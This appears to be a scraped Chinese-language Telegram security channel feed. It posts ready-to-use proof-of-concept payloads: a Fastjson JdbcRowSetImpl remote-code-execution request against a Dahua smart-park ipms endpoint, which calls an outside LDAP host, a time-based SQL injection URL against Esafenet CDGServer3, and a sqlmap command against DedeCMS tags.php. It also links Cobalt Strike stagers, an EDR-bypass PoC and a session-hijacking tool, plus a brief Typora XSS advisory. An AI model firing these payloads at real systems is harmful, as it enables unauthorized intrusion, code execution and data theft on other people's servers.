(CVE-2023-2317) 基于 Typora DOM 的跨站点脚本导致远程代码执行
Typora 是一款流行的跨平台 Markdown 编辑器,允许用户创建和编辑具有实时预览功能的 Markdown 文件
https://starlabs.sg/advisories/23/23-2317/
Typora 是一款流行的跨平台 Markdown 编辑器,允许用户创建和编辑具有实时预览功能的 Markdown 文件
https://starlabs.sg/advisories/23/23-2317/
STAR Labs
(CVE-2023-2317) Typora DOM-Based Cross-site Scripting leading to Remote Code Execution
Summary: Product Typora Vendor Typora Severity High Affected Versions Typora for Windows/Linux < 1.6.7 Tested Versions Typora for Windows 1.5.12, Typora for Linux 1.5.10 CVE Identifier CVE-2023-2317 CVE Description DOM-based XSS in updater/update.html…
👍5❤2
大华智慧园区综合管理平台 ipms 远程代码执行漏洞 POC
POST /ipms/barpay/pay HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: id
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://xxxxx/Basic/TomcatEcho", "autoCommit": true}
POST /ipms/barpay/pay HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: id
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://xxxxx/Basic/TomcatEcho", "autoCommit": true}
❤1
亿塞通 update.jsp sql 注入漏洞 POC
GET http://1ip:port/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20D ELAY%20%270:0:2%27--
GET http://1ip:port/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20D ELAY%20%270:0:2%27--
👍1
Forwarded from 踹哈公寓
一个 Pwn 从 0 到 0.1 的自学指南
Assembly-Language 汇编语言
Reverse-Engineering 逆向工程
PWN Tools 分析工具
PWN You-just-got-pwned!
Reverse Tools 分析工具
Angr CTF 及其 WriteUp
链接:https://pan.quark.cn/s/7a7b26010e18
Assembly-Language 汇编语言
Reverse-Engineering 逆向工程
PWN Tools 分析工具
PWN You-just-got-pwned!
Reverse Tools 分析工具
Angr CTF 及其 WriteUp
链接:https://pan.quark.cn/s/7a7b26010e18
pan.quark.cn
夸克网盘分享
夸克网盘是夸克推出的一款云服务产品,功能包括云存储、高清看剧、文件在线解压、PDF一键转换等。通过夸克网盘可随时随地管理和使用照片、文档、手机资料,目前支持Android、iOS、PC、iPad。
会话劫持 允许通过注入恶意 JavaScript 代码来劫持用户会话的工具。
https://github.com/doyensec/Session-Hijacking-Visual-Exploitation
https://github.com/doyensec/Session-Hijacking-Visual-Exploitation
GitHub
GitHub - doyensec/Session-Hijacking-Visual-Exploitation: Session Hijacking Visual Exploitation
Session Hijacking Visual Exploitation. Contribute to doyensec/Session-Hijacking-Visual-Exploitation development by creating an account on GitHub.
❤1
无文件落地执行的 17 种方法。
https://github.com/RedXRanger/StageStrike
https://github.com/RedXRanger/StageStrike
GitHub
GitHub - RedXRanger/StageStrike: Custom Cobalt Strike stagers using different methods of thread execution and memory allocation
Custom Cobalt Strike stagers using different methods of thread execution and memory allocation - RedXRanger/StageStrike
❤3👍1
DEF CON 31中提出的ContainYourself研究的POC,它滥用Windows容器框架来绕过EDR
https://github.com/deepinstinct/ContainYourself
https://github.com/deepinstinct/ContainYourself
GitHub
GitHub - deepinstinct/ContainYourself: A PoC of the ContainYourself research presented in DEFCON 31, which abuses the Windows containers…
A PoC of the ContainYourself research presented in DEFCON 31, which abuses the Windows containers framework to bypass EDRs. - deepinstinct/ContainYourself
❤1👍1
Dedecms 织梦 sql 注入 POC
DedeCMS 5.7.110 中发现了一个严重漏洞。此漏洞影响文件/uploads/tags.php 的未知代码。对参数 tag_alias 的操作会导致 sql 注入。
sqlmap.py -u "http://……/tags.php?QUERY_STRING=/alias/bbb*" -dbs --batch
DedeCMS 5.7.110 中发现了一个严重漏洞。此漏洞影响文件/uploads/tags.php 的未知代码。对参数 tag_alias 的操作会导致 sql 注入。
sqlmap.py -u "http://……/tags.php?QUERY_STRING=/alias/bbb*" -dbs --batch
👍1